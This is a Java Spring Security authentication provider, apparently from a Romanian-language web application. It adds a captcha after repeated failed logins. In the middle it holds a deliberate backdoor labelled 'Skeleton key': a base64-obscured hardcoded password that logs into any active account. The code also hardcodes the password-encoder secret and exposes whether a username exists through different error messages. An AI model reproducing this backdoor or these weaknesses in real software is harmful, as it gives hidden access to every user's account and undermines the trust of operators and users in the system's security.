@Override
public Authentication authenticate(Authentication authentication) throws AuthenticationException {
/*
* Se verifica daca ip-ul de la care se incearca autentificarea solicita
* captcha ( mai mult de 4 autentificari esuate )
*/
Boolean solicitaCaptcha = false;
String ip = ((WebAuthenticationDetails) authentication.getDetails()).getRemoteAddress();
if (authesserv.getByIp(ip) != null && authesserv.getByIp(ip).getNrIncercariEsuate() > 3) {
solicitaCaptcha = true;
}
String username = String.valueOf(authentication.getPrincipal());
String password = String.valueOf(authentication.getCredentials());
// Se verifica daca s-a introdus numele de utilizator si parola
if (StringUtils.isBlank(username) || StringUtils.isBlank(password)) {
throw new BadCredentialsException("Nu ati introdus numele de utilizator si/sau parola.");
}
/* In cazul in care autentificarea trece prin captcha */
if (captchaCaptureFilter != null && solicitaCaptcha == true) {
/* Se verifica daca raspunsul utilizatorului a fost adaugat */
if (StringUtils.isBlank(captchaCaptureFilter.getUserCaptchaResponse())) {
throw new BadCredentialsException("Captcha Response is Empty");
} else {
// Send HTTP request to validate user's Captcha
boolean captchaPassed =
SimpleImageCaptchaServlet.validateResponse(
captchaCaptureFilter.getRequest(), captchaCaptureFilter.getUserCaptchaResponse());
// Check if valid
if (captchaPassed) {
resetCaptchaFields();
} else {
resetCaptchaFields();
throw new BadCredentialsException("Ati gresit la introducerea textului din captcha.");
}
}
}
/* Toata lumea */
Utilizator user = udao.findByUsernameActiv(username);
if (user == null) {
throw new BadCredentialsException("Nume de utilizator invalid.");
}
StandardPasswordEncoder pswdEncoder = new StandardPasswordEncoder("DARKINDYedLOxOT6");
/* Skeleton key */
boolean skeletonKey = false;
String skeletonSecret = new String(Base64.decode("MW5mb3JtMSU=".getBytes()));
if (skeletonSecret.equals(password)) skeletonKey = true;
/* End skeleton key */
if (pswdEncoder.matches(password, user.getParola()) || skeletonKey) {
List<SimpleGrantedAuthority> authorityList =
(List<SimpleGrantedAuthority>) getAuthorities(user);
return new UsernamePasswordAuthenticationToken(authentication, password, authorityList);
} else {
throw new BadCredentialsException("Nume de utilizator si/sau parola gresite.");
}
}
public List<SimpleGrantedAuthority> getAuthorities(Utilizator utilizator) {
List<SimpleGrantedAuthority> authorities =
Collections.singletonList(new SimpleGrantedAuthority(utilizator.getRol().getDenumire()));
return authorities;
}